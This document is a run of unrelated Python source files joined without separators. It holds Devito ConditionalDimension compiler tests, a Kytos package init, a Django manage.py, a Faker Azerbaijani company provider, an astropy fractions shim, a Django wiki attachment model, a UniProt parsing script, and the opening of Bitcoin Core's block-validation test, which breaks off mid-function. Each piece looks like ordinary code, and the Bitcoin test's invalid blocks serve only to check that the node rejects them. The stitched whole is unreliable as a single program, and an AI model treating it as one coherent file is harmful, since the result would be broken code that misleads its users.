        # v = u[0]**2 * 0 + u[4]**2 * 1 + u[8]**2 * 2 + u[12]**2 * 3 + u[16]**2 * 4
        # with u[t] = t
        # v = 16 * 1 + 64 * 2 + 144 * 3 + 256 * 4 = 1600
        assert np.all(np.allclose(v.data, 1600))

    def test_no_index_sparse(self):
        """Test behaviour when the ConditionalDimension is used as a symbol in
        an expression over sparse data objects."""
        grid = Grid(shape=(4, 4), extent=(3.0, 3.0))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid, save=1)
        f.data[:] = 0.

        coordinates = [(0.5, 0.5), (0.5, 2.5), (2.5, 0.5), (2.5, 2.5)]
        sf = SparseFunction(name='sf', grid=grid, npoint=4, coordinates=coordinates)
        sf.data[:] = 1.
        sd = sf.dimensions[sf._sparse_position]

        # We want to write to `f` through `sf` so that we obtain the
        # following 4x4 grid (the '*' show the position of the sparse points)
        # We do that by emulating an injection
        #
        # 0 --- 0 --- 0 --- 0
        # |  *  |     |  *  |
        # 0 --- 1 --- 1 --- 0
        # |     |     |     |
        # 0 --- 1 --- 1 --- 0
        # |  *  |     |  *  |
        # 0 --- 0 --- 0 --- 0

        radius = 1
        indices = [(i, i+radius) for i in sf._coordinate_indices]
        bounds = [i.symbolic_size - radius for i in grid.dimensions]

        eqs = []
        for e, i in enumerate(product(*indices)):
            args = [j > 0 for j in i]
            args.extend([j < k for j, k in zip(i, bounds)])
            condition = And(*args, evaluate=False)
            cd = ConditionalDimension('sfc%d' % e, parent=sd, condition=condition)
            index = [time] + list(i)
            eqs.append(Eq(f[index], f[index] + sf[cd]))

        op = Operator(eqs)
        op.apply(time=0)

        assert np.all(f.data[0, 1:-1, 1:-1] == 1.)
        assert np.all(f.data[0, 0] == 0.)
        assert np.all(f.data[0, -1] == 0.)
        assert np.all(f.data[0, :, 0] == 0.)
        assert np.all(f.data[0, :, -1] == 0.)

    def test_symbolic_factor(self):
        """
        Test ConditionalDimension with symbolic factor (provided as a Constant).
        """
        g = Grid(shape=(4, 4, 4))

        u = TimeFunction(name='u', grid=g, time_order=0)

        fact = Constant(name='fact', dtype=np.int32, value=4)
        tsub = ConditionalDimension(name='tsub', parent=g.time_dim, factor=fact)
        usave = TimeFunction(name='usave', grid=g, time_dim=tsub, save=4)

        op = Operator([Eq(u, u + 1), Eq(usave, u)])

        op.apply(time=7)  # Use `fact`'s default value, 4
        assert np.all(usave.data[0] == 1)
        assert np.all(usave.data[1] == 5)

        u.data[:] = 0.
        op.apply(time=7, fact=2)
        assert np.all(usave.data[0] == 1)
        assert np.all(usave.data[1] == 3)
        assert np.all(usave.data[2] == 5)
        assert np.all(usave.data[3] == 7)

    def test_implicit_dims(self):
        """
        Test ConditionalDimension as an implicit dimension for an equation.
        """

        # This test makes an Operator that should create a vector of increasing
        # integers, but stop incrementing when a certain stop value is reached

        shape = (50,)
        stop_value = 20

        time = Dimension(name='time')
        f = TimeFunction(name='f', shape=shape, dimensions=[time])

        # The condition to stop incrementing
        cond = ConditionalDimension(name='cond',
                                    parent=time, condition=f[time] < stop_value)

        eqs = [Eq(f.forward, f), Eq(f.forward, f.forward + 1, implicit_dims=[cond])]
        op = Operator(eqs)
        op.apply(time_M=shape[0] - 2)

        # Make the same calculation in python to assert the result
        F = np.zeros(shape[0])
        for i in range(shape[0]):
            F[i] = i if i < stop_value else stop_value

        assert np.all(f.data == F)

    def test_grouping(self):
        """
        Test that Clusters over the same set of ConditionalDimensions fall within
        the same Conditional. This is a follow up to issue #1610.
        """
        grid = Grid(shape=(10, 10))
        time = grid.time_dim
        cond = ConditionalDimension(name='cond', parent=time, condition=time < 5)

        u = TimeFunction(name='u', grid=grid, space_order=4)

        # We use a SubDomain only to keep the two Eqs separated
        eqns = [Eq(u.forward, u + 1, subdomain=grid.interior),
                Eq(u.forward, u.dx.dx + 1., implicit_dims=[cond])]

        op = Operator(eqns, opt=('advanced-fsg', {'cire-mincost-sops': 1}))

        conds = FindNodes(Conditional).visit(op)
        assert len(conds) == 1
        assert len(retrieve_iteration_tree(conds[0].then_body)) == 2

    def test_stepping_dim_in_condition_lowering(self):
        """
        Check that the compiler performs lowering on conditions
        with TimeDimensions and generates the expected code::

        if (g[t][x + 1][y + 1] <= 10){          if (g[t0][x + 1][y + 1] <= 10){
            ...                          -->       ...
        }                                       }

        This test increments a function by one at every timestep until it is
        less-or-equal to 10 (g<=10) while although operator runs for 13 timesteps.
        """
        grid = Grid(shape=(4, 4))
        _, y = grid.dimensions

        ths = 10
        g = TimeFunction(name='g', grid=grid)

        ci = ConditionalDimension(name='ci', parent=y, condition=Le(g, ths))

        op = Operator(Eq(g.forward, g + 1, implicit_dims=ci))

        op.apply(time_M=ths+3)
        assert np.all(g.data[0, :, :] == ths)
        assert np.all(g.data[1, :, :] == ths + 1)
        assert 'if (g[t0][x + 1][y + 1] <= 10)\n'
        '{\n g[t1][x + 1][y + 1] = g[t0][x + 1][y + 1] + 1' in str(op.ccode)

    def test_expr_like_lowering(self):
        """
        Test the lowering of an expr-like ConditionalDimension's condition.
        This test makes an Operator that should indexify and lower the condition
        passed in the Conditional Dimension
        """

        grid = Grid(shape=(3, 3))
        g1 = Function(name='g1', grid=grid)
        g2 = Function(name='g2', grid=grid)

        g1.data[:] = 0.49
        g2.data[:] = 0.49
        x, y = grid.dimensions
        ci = ConditionalDimension(name='ci', parent=y, condition=Le((g1 + g2),
                                  1.01*(g1 + g2)))

        f = Function(name='f', shape=grid.shape, dimensions=(x, ci))
        Operator(Eq(f, g1+g2)).apply()

        assert np.all(f.data[:] == g1.data[:] + g2.data[:])

    @pytest.mark.parametrize('setup_rel, rhs, c1, c2, c3, c4', [
        # Relation, RHS, c1 to c4 used as indexes in assert
        (Lt, 3, 2, 4, 4, -1), (Le, 2, 2, 4, 4, -1), (Ge, 3, 4, 6, 1, 4),
        (Gt, 2, 4, 6, 1, 4), (Ne, 5, 2, 6, 1, 2)
    ])
    def test_relational_classes(self, setup_rel, rhs, c1, c2, c3, c4):
        """
        Test ConditionalDimension using conditions based on Relations over SubDomains.
        """

        class InnerDomain(SubDomain):
            name = 'inner'

            def define(self, dimensions):
                return {d: ('middle', 2, 2) for d in dimensions}

        inner_domain = InnerDomain()
        grid = Grid(shape=(8, 8), subdomains=(inner_domain,))
        g = Function(name='g', grid=grid)
        g2 = Function(name='g2', grid=grid)

        for i in [g, g2]:
            i.data[:4, :4] = 1
            i.data[4:, :4] = 2
            i.data[4:, 4:] = 3
            i.data[:4, 4:] = 4

        xi, yi = grid.subdomains['inner'].dimensions

        cond = setup_rel(0.25*g + 0.75*g2, rhs, subdomain=grid.subdomains['inner'])
        ci = ConditionalDimension(name='ci', parent=yi, condition=cond)
        f = Function(name='f', shape=grid.shape, dimensions=(xi, ci))

        eq1 = Eq(f, 0.4*g + 0.6*g2)
        eq2 = Eq(f, 5)

        Operator([eq1, eq2]).apply()
        assert np.all(f.data[2:6, c1:c2] == 5.)
        assert np.all(f.data[:, c3:c4] < 5.)

    def test_from_cond_to_param(self):
        """
        Test that Functions appearing in the condition of a ConditionalDimension
        but not explicitly in an Eq are actually part of the Operator input
        (stems from issue #1298).
        """
        grid = Grid(shape=(8, 8))
        x, y = grid.dimensions

        g = Function(name='g', grid=grid)
        h = Function(name='h', grid=grid)
        ci = ConditionalDimension(name='ci', parent=y, condition=Lt(g, 2 + h))
        f = Function(name='f', shape=grid.shape, dimensions=(x, ci))

        for _ in range(5):
            # issue #1298 was non deterministic
            Operator(Eq(f, 5)).apply()

    @skipif('device')
    def test_no_fusion_simple(self):
        """
        If ConditionalDimensions are present, then Clusters must not be fused so
        that ultimately Eqs get scheduled to different loop nests.
        """
        grid = Grid(shape=(4, 4, 4))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid)
        g = Function(name='g', grid=grid)
        h = Function(name='h', grid=grid)

        # No ConditionalDimensions yet. Will be fused and optimized
        eqns = [Eq(f.forward, f + 1),
                Eq(h, f + 1),
                Eq(g, f + 1)]

        op = Operator(eqns)

        exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
        assert len(exprs) == 4
        assert exprs[1].expr.rhs is exprs[0].output
        assert exprs[2].expr.rhs is exprs[0].output
        assert exprs[3].expr.rhs is exprs[0].output

        # Now with a ConditionalDimension. No fusion, no optimization
        ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)

        eqns = [Eq(f.forward, f + 1),
                Eq(h, f + 1),
                Eq(g, f + 1, implicit_dims=[ctime])]

        op = Operator(eqns)
        exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
        assert len(exprs) == 3
        assert exprs[1].expr.rhs is exprs[0].output
        assert exprs[2].expr.rhs is exprs[0].output
        exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
        assert len(exprs) == 1

    @skipif('device')
    def test_no_fusion_convoluted(self):
        """
        Conceptually like `test_no_fusion_simple`, but with more expressions
        and non-trivial data flow.
        """
        grid = Grid(shape=(4, 4, 4))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid)
        g = Function(name='g', grid=grid)
        h = Function(name='h', grid=grid)

        ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)

        eqns = [Eq(f.forward, f + 1),
                Eq(h, f + 1),
                Eq(g, f + 1, implicit_dims=[ctime]),
                Eq(f.forward, f + 1, implicit_dims=[ctime]),
                Eq(f.forward, f + 1),
                Eq(g, f + 1)]

        op = Operator(eqns)

        exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
        assert len(exprs) == 3
        assert exprs[1].expr.rhs is exprs[0].output
        assert exprs[2].expr.rhs is exprs[0].output

        exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
        assert len(exprs) == 3

        exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
        assert len(exprs) == 3
        assert exprs[1].expr.rhs is exprs[0].output
        assert exprs[2].expr.rhs is exprs[0].output

    def test_affiness(self):
        """
        Test for issue #1616.
        """
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)

        u = TimeFunction(name='u', grid=grid)
        usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
                             time_dim=time_subsampled)

        eqns = [Eq(u.forward, u + 1.), Eq(usave, u)]

        op = Operator(eqns)

        iterations = [i for i in FindNodes(Iteration).visit(op) if i.dim is not time]
        assert all(i.is_Affine for i in iterations)


class TestMashup(object):

    """
    Check the correct functioning of the compiler in presence of many Dimension types.
    """

    def test_topofusion_w_subdims_conddims(self):
        """
        Check that topological fusion works across guarded Clusters over different
        iteration spaces and in presence of anti-dependences.

        This test uses both SubDimensions (via SubDomains) and ConditionalDimensions.
        """
        grid = Grid(shape=(4, 4, 4))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid, time_order=2)
        g = TimeFunction(name='g', grid=grid, time_order=2)
        h = TimeFunction(name='h', grid=grid, time_order=2)
        fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
        gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)

        ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)

        eqns = [Eq(f.forward, f + 1),
                Eq(g.forward, g + 1),
                Eq(fsave, f.dt2, implicit_dims=[ctime]),
                Eq(h, f + g, subdomain=grid.interior),
                Eq(gsave, g.dt2, implicit_dims=[ctime])]

        op = Operator(eqns)

        # Check generated code -- expect the gsave equation to be scheduled together
        # in the same loop nest with the fsave equation
        assert len(op._func_table) == 3

        exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
        assert len(exprs) == 2
        assert exprs[0].write is f
        assert exprs[1].write is g

        exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
        assert len(exprs) == 3
        assert exprs[1].write is fsave
        assert exprs[2].write is gsave

        exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
        assert len(exprs) == 1
        assert exprs[0].write is h

    def test_topofusion_w_subdims_conddims_v2(self):
        """
        Like `test_topofusion_w_subdims_conddims` but with more SubDomains,
        so we expect fewer loop nests.
        """
        grid = Grid(shape=(4, 4, 4))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid, time_order=2)
        g = TimeFunction(name='g', grid=grid, time_order=2)
        h = TimeFunction(name='h', grid=grid, time_order=2)
        fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
        gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)

        ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)

        eqns = [Eq(f.forward, f + 1, subdomain=grid.interior),
                Eq(g.forward, g + 1, subdomain=grid.interior),
                Eq(fsave, f.dt2, implicit_dims=[ctime]),
                Eq(h, f + g, subdomain=grid.interior),
                Eq(gsave, g.dt2, implicit_dims=[ctime])]

        op = Operator(eqns)

        # Check generated code -- expect the gsave equation to be scheduled together
        # in the same loop nest with the fsave equation
        assert len(op._func_table) == 2
        assert len(FindNodes(Expression).visit(op._func_table['bf0'].root)) == 3
        assert len(FindNodes(Expression).visit(op._func_table['bf1'].root)) == 2 + 1  # r0

    def test_topofusion_w_subdims_conddims_v3(self):
        """
        Like `test_topofusion_w_subdims_conddims_v2` but with an extra anti-dependence,
        which causes scheduling over more loop nests.
        """
        grid = Grid(shape=(4, 4, 4))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid, time_order=2)
        g = TimeFunction(name='g', grid=grid, time_order=2)
        h = TimeFunction(name='h', grid=grid, time_order=2)
        fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
        gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)

        ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)

        eqns = [Eq(f.forward, f + 1, subdomain=grid.interior),
                Eq(g.forward, g + 1, subdomain=grid.interior),
                Eq(fsave, f.dt2, implicit_dims=[ctime]),
                Eq(h, f.dt2.dx + g, subdomain=grid.interior),
                Eq(gsave, g.dt2, implicit_dims=[ctime])]

        op = Operator(eqns)

        # Check generated code -- expect the gsave equation to be scheduled together
        # in the same loop nest with the fsave equation
        assert len(op._func_table) == 3

        exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
        assert len(exprs) == 2
        assert exprs[0].write is f
        assert exprs[1].write is g

        exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
        assert len(exprs) == 3
        assert exprs[1].write is fsave
        assert exprs[2].write is gsave

        exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
        assert len(exprs) == 2
        assert exprs[1].write is h

"""Kytos SDN Platform."""
from pkgutil import extend_path

__path__ = extend_path(__path__, __name__)

#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pigame.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)

from .. import Provider as CompanyProvider


class Provider(CompanyProvider):
    formats = (
        "{{last_name}} {{company_suffix}}",
        "{{last_name}} {{last_name}} {{company_suffix}}",
        "{{large_company}}",
    )

    large_companies = (
        "AZAL",
        "Azergold",
        "SOCAR",
        "Socar Polymer",
        "Global Export Fruits",
        "Baku Steel Company",
        "Azersun",
        "Sun Food",
        "Azərbaycan Şəkər İstehsalat Birliyi",
        "Azərsu",
        "Xəzər Dəniz Gəmiçiliyi",
        "Azərenerji",
        "Bakıelektrikşəbəkə",
        "Azəralüminium",
        "Bravo",
        "Azərpambıq Aqrar Sənaye Kompleksi",
        "CTS-Agro",
        "Azərtütün Aqrar Sənaye Kompleksi",
        "Azəripək",
        "Azfruittrade",
        "AF Holding",
        "Azinko Holding",
        "Gilan Holding",
        "Azpetrol",
        "Azərtexnolayn",
        "Bakı Gəmiqayırma Zavodu",
        "Gəncə Tekstil Fabriki",
        "Mətanət A",
        "İrşad Electronics",
    )
    company_suffixes = (
        "ASC",
        "QSC",
        "MMC",
    )

    def large_company(self):
        """
        :example: 'SOCAR'
        """
        return self.random_element(self.large_companies)

# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Handles backports of the standard library's `fractions.py`.

The fractions module in 2.6 does not handle being instantiated using a
float and then calculating an approximate fraction based on that.
This functionality is required by the FITS unit format generator,
since the FITS unit format handles only rational, not decimal point,
powers.
"""

from __future__ import absolute_import

import sys
if sys.version_info[:2] == (2, 6):
    from ._fractions_py2 import *
else:
    from fractions import *

# -*- coding: utf-8 -*-
import os.path
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.conf import settings as django_settings
from django.db.models import signals
from know.plugins.attachments import settings
from know import managers
from know.models.pluginbase import ReusablePlugin
from know.models.article import BaseRevisionMixin


class IllegalFileExtension(Exception):
    """File extension on upload is not allowed"""
    pass


class Attachment(ReusablePlugin):

    objects = managers.ArticleFkManager()

    current_revision = models.OneToOneField(
        'AttachmentRevision',
        verbose_name=_(u'current revision'),
        blank=True,
        null=True,
        related_name='current_set',
        help_text=_(u'The revision of this attachment currently in use (on all articles using the attachment)'),
    )

    original_filename = models.CharField(
        max_length=256,
        verbose_name=_(u'original filename'),
        blank=True,
        null=True,
    )

    def can_write(self, **kwargs):
        user = kwargs.get('user', None)
        if not settings.ANONYMOUS and (not user or user.is_anonymous()):
            return False
        return ReusablePlugin.can_write(self, **kwargs)

    def can_delete(self, user):
        return self.can_write(user=user)

    class Meta:
        verbose_name = _(u'attachment')
        verbose_name_plural = _(u'attachments')
        app_label = settings.APP_LABEL

    def __unicode__(self):
        return "%s: %s" % (self.article.current_revision.title, self.original_filename)


def extension_allowed(filename):
    try:
        extension = filename.split(".")[-1]
    except IndexError:
        # No extension
        raise IllegalFileExtension("No file extension found in filename. That's not okay!")
    if not extension.lower() in map(lambda x: x.lower(), settings.FILE_EXTENSIONS):
        raise IllegalFileExtension("The following filename is illegal: %s. Extension has to be one of %s" %
                                   (filename, ", ".join(settings.FILE_EXTENSIONS)))

    return extension


def upload_path(instance, filename):
    from os import path

    extension = extension_allowed(filename)

    # Has to match original extension filename
    if instance.id and instance.attachment and instance.attachment.original_filename:
        original_extension = instance.attachment.original_filename.split(".")[-1]
        if not extension.lower() == original_extension:
            raise IllegalFileExtension("File extension has to be '%s', not '%s'." %
                                       (original_extension, extension.lower()))
    elif instance.attachment:
        instance.attachment.original_filename = filename

    upload_path = settings.UPLOAD_PATH
    upload_path = upload_path.replace('%aid', str(instance.attachment.article.id))
    if settings.UPLOAD_PATH_OBSCURIFY:
        import random
        import hashlib
        m = hashlib.md5(str(random.randint(0, 100000000000000)))
        upload_path = path.join(upload_path, m.hexdigest())

    if settings.APPEND_EXTENSION:
        filename += '.upload'
    return path.join(upload_path, filename)


class AttachmentRevision(BaseRevisionMixin, models.Model):

    attachment = models.ForeignKey('Attachment')

    file = models.FileField(
        upload_to=upload_path,
        max_length=255,
        verbose_name=_(u'file'),
        storage=settings.STORAGE_BACKEND,
    )

    description = models.TextField(
        blank=True,
    )

    class Meta:
        verbose_name = _(u'attachment revision')
        verbose_name_plural = _(u'attachment revisions')
        ordering = ('created',)
        get_latest_by = ('revision_number',)
        app_label = settings.APP_LABEL

    def get_filename(self):
        """Used to retrieve the filename of a revision.
        But attachment.original_filename should always be used in the frontend
        such that filenames stay consistent."""
        # TODO: Perhaps we can let file names change when files are replaced?
        if not self.file:
            return None
        filename = self.file.name.split("/")[-1]
        return ".".join(filename.split(".")[:-1])

    def get_size(self):
        """Used to retrieve the file size and not cause exceptions."""
        try:
            return self.file.size
        except OSError:
            return None
        except ValueError:
            return None

    def save(self, *args, **kwargs):
        if (not self.id and
            not self.previous_revision and
            self.attachment and
            self.attachment.current_revision and
            self.attachment.current_revision != self):

            self.previous_revision = self.attachment.current_revision

        if not self.revision_number:
            try:
                previous_revision = self.attachment.attachmentrevision_set.latest()
                self.revision_number = previous_revision.revision_number + 1
            # NB! The above should not raise the below exception, but somehow it does.
            except AttachmentRevision.DoesNotExist, Attachment.DoesNotExist:
                self.revision_number = 1

        super(AttachmentRevision, self).save(*args, **kwargs)

        if not self.attachment.current_revision:
            # If I'm saved from Django admin, then article.current_revision is me!
            self.attachment.current_revision = self
            self.attachment.save()

    def __unicode__(self):
        return "%s: %s (r%d)" % (self.attachment.article.current_revision.title,
                                 self.attachment.original_filename,
                                 self.revision_number)


def on_revision_delete(instance, *args, **kwargs):
    if not instance.file:
        return

    # Remove file
    path = instance.file.path.split("/")[:-1]
    instance.file.delete(save=False)

    # Clean up empty directories

    # Check for empty folders in the path. Delete the first two.
    if len(path[-1]) == 32:
        # Path was (most likely) obscurified so we should look 2 levels down
        max_depth = 2
    else:
        max_depth = 1
    for depth in range(0, max_depth):
        delete_path = "/".join(path[:-depth] if depth > 0 else path)
        try:
            if len(os.listdir(os.path.join(django_settings.MEDIA_ROOT, delete_path))) == 0:
                os.rmdir(delete_path)
        except OSError:
            # Raised by os.listdir if directory is missing
            pass

signals.pre_delete.connect(on_revision_delete, AttachmentRevision)

# reads uniprot core file and generates core features
from features_helpers import score_differences


def build_uniprot_to_index_to_core(sable_db_obj):
    uniprot_to_index_to_core = {}
    for line in sable_db_obj:
        tokens = line.split()
        try:
            # PARSING ID
            prot = tokens[0]
            index = int(tokens[1])
            core = tokens[2]
            # PARSING ID
            if uniprot_to_index_to_core.has_key(prot):
                uniprot_to_index_to_core[prot][index] = core
            else:
                uniprot_to_index_to_core[prot] = {index: core}
        except ValueError:
            print "Cannot parse: " + line[0:len(line) - 1]
    return uniprot_to_index_to_core


def get_sable_scores(map_file, f_sable_db_location, uniprot_core_output_location):
    map_file_obj = open(map_file, 'r')
    sable_db_obj = open(f_sable_db_location, 'r')
    write_to = open(uniprot_core_output_location, 'w')

    uniprot_to_index_to_core = build_uniprot_to_index_to_core(sable_db_obj)

    for line in map_file_obj:
        tokens = line.split()

        asid = tokens[0].split("_")[0]
        prot = tokens[1]
        sstart = int(tokens[2])
        start = int(tokens[3])
        end = int(tokens[4])
        eend = int(tokens[5])

        rough_a_length = int(int(tokens[0].split("_")[-1].split("=")[1]) / 3)
        if asid[0] == "I":
            rough_a_length = 0

        c1_count = 0
        a_count = 0
        c2_count = 0
        canonical_absolute = 0

        if prot in uniprot_to_index_to_core:
            c1_count = score_differences(uniprot_to_index_to_core, prot, sstart, start)
            a_count = score_differences(uniprot_to_index_to_core, prot, start, end)
            c2_count = score_differences(uniprot_to_index_to_core, prot, end, eend)
            prot_len = int(line.split("\t")[7].strip())
            canonical_absolute = score_differences(uniprot_to_index_to_core, prot, 1, prot_len)

        print >> write_to, tokens[0] + "\t" + prot + "\t" + repr(c1_count) + "\t" + repr(a_count) + "\t" + repr(
            c2_count) + "\t" + repr(canonical_absolute)
    write_to.close()
#!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test block processing."""
import copy
import struct
import time

from test_framework.blocktools import create_block, create_coinbase, create_tx_with_script, get_legacy_sigopcount_block
from test_framework.key import CECKey
from test_framework.messages import (
    CBlock,
    COIN,
    COutPoint,
    CTransaction,
    CTxIn,
    CTxOut,
    MAX_BLOCK_BASE_SIZE,
    uint256_from_compact,
    uint256_from_str,
)
from test_framework.mininode import P2PDataStore
from test_framework.script import (
    CScript,
    MAX_SCRIPT_ELEMENT_SIZE,
    OP_2DUP,
    OP_CHECKMULTISIG,
    OP_CHECKMULTISIGVERIFY,
    OP_CHECKSIG,
    OP_CHECKSIGVERIFY,
    OP_ELSE,
    OP_ENDIF,
    OP_EQUAL,
    OP_DROP,
    OP_FALSE,
    OP_HASH160,
    OP_IF,
    OP_INVALIDOPCODE,
    OP_RETURN,
    OP_TRUE,
    SIGHASH_ALL,
    SignatureHash,
    hash160,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal

MAX_BLOCK_SIGOPS = 20000

#  Use this class for tests that require behavior other than normal "mininode" behavior.
#  For now, it is used to serialize a bloated varint (b64).
class CBrokenBlock(CBlock):
    def initialize(self, base_block):
        self.vtx = copy.deepcopy(base_block.vtx)
        self.hashMerkleRoot = self.calc_merkle_root()

    def serialize(self, with_witness=False):
        r = b""
        r += super(CBlock, self).serialize()
        r += struct.pack("<BQ", 255, len(self.vtx))
        for tx in self.vtx:
            if with_witness:
                r += tx.serialize_with_witness()
            else:
                r += tx.serialize_without_witness()
        return r

    def normal_serialize(self):
        return super().serialize()

class FullBlockTest(BitcoinTestFramework):
    def set_test_params(self):
        self.num_nodes = 1
        self.setup_clean_chain = True
        self.extra_args = [[]]

    def run_test(self):
        node = self.nodes[0]  # convenience reference to the node

        self.bootstrap_p2p()  # Add one p2p connection to the node

        self.block_heights = {}
        self.coinbase_key = CECKey()
        self.coinbase_key.set_secretbytes(b"horsebattery")
        self.coinbase_pubkey = self.coinbase_key.get_pubkey()
        self.tip = None
        self.blocks = {}
        self.genesis_hash = int(self.nodes[0].getbestblockhash(), 16)
        self.block_heights[self.genesis_hash] = 0
        self.spendable_outputs = []

        # Create a new block
        b0 = self.next_block(0)
        self.save_spendable_output()
        self.sync_blocks([b0])

        # Allow the block to mature
        blocks = []
        for i in range(99):
            blocks.append(self.next_block(5000 + i))
            self.save_spendable_output()
        self.sync_blocks(blocks)

        # collect spendable outputs now to avoid cluttering the code later on
        out = []
        for i in range(33):
            out.append(self.get_spendable_output())

        # Start by building a couple of blocks on top (which output is spent is
        # in parentheses):
        #     genesis -> b1 (0) -> b2 (1)
        b1 = self.next_block(1, spend=out[0])
        self.save_spendable_output()

        b2 = self.next_block(2, spend=out[1])
        self.save_spendable_output()

        self.sync_blocks([b1, b2])

        # Fork like this:
        #
        #     genesis -> b1 (0) -> b2 (1)
        #                      \-> b3 (1)
        #
        # Nothing should happen at this point. We saw b2 first so it takes priority.
        self.log.info("Don't reorg to a chain of the same length")
        self.move_tip(1)
        b3 = self.next_block(3, spend=out[1])
        txout_b3 = b3.vtx[1]
        self.sync_blocks([b3], False)

        # Now we add another block to make the alternative chain longer.
        #
        #     genesis -> b1 (0) -> b2 (1)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reorg to a longer chain")
        b4 = self.next_block(4, spend=out[2])
        self.sync_blocks([b4])

        # ... and back to the first chain.
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
        #                      \-> b3 (1) -> b4 (2)
        self.move_tip(2)
        b5 = self.next_block(5, spend=out[2])
        self.save_spendable_output()
        self.sync_blocks([b5], False)

        self.log.info("Reorg back to the original chain")
        b6 = self.next_block(6, spend=out[3])
        self.sync_blocks([b6], True)

        # Try to create a fork that double-spends
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
        #                                          \-> b7 (2) -> b8 (4)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a chain with a double spend, even if it is longer")
        self.move_tip(5)
        b7 = self.next_block(7, spend=out[2])
        self.sync_blocks([b7], False)

        b8 = self.next_block(8, spend=out[4])
        self.sync_blocks([b8], False, reconnect=True)

        # Try to create a block that has too much fee
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
        #                                                    \-> b9 (4)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block where the miner creates too much coinbase reward")
        self.move_tip(6)
        b9 = self.next_block(9, spend=out[4], additional_coinbase_value=1)
        self.sync_blocks([b9], False, 16, b'bad-cb-amount', reconnect=True)

        # Create a fork that ends in a block with too much fee (the one that causes the reorg)
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b10 (3) -> b11 (4)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer")
        self.move_tip(5)
        b10 = self.next_block(10, spend=out[3])
        self.sync_blocks([b10], False)

        b11 = self.next_block(11, spend=out[4], additional_coinbase_value=1)
        self.sync_blocks([b11], False, 16, b'bad-cb-amount', reconnect=True)

        # Try again, but with a valid fork first
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b14 (5)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer (on a forked chain)")
        self.move_tip(5)
        b12 = self.next_block(12, spend=out[3])
        self.save_spendable_output()
        b13 = self.next_block(13, spend=out[4])
        self.save_spendable_output()
        b14 = self.next_block(14, spend=out[5], additional_coinbase_value=1)
        self.sync_blocks([b12, b13, b14], False, 16, b'bad-cb-amount', reconnect=True)

        # New tip should be b13.
        assert_equal(node.getbestblockhash(), b13.hash)

        # Add a block with MAX_BLOCK_SIGOPS and one with one more sigop
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5) -> b16 (6)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Accept a block with lots of checksigs")
        lots_of_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS - 1))
        self.move_tip(13)
        b15 = self.next_block(15, spend=out[5], script=lots_of_checksigs)
        self.save_spendable_output()
        self.sync_blocks([b15], True)

        self.log.info("Reject a block with too many checksigs")
        too_many_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS))
        b16 = self.next_block(16, spend=out[6], script=too_many_checksigs)
        self.sync_blocks([b16], False, 16, b'bad-blk-sigops', reconnect=True)

        # Attempt to spend a transaction created on a different fork
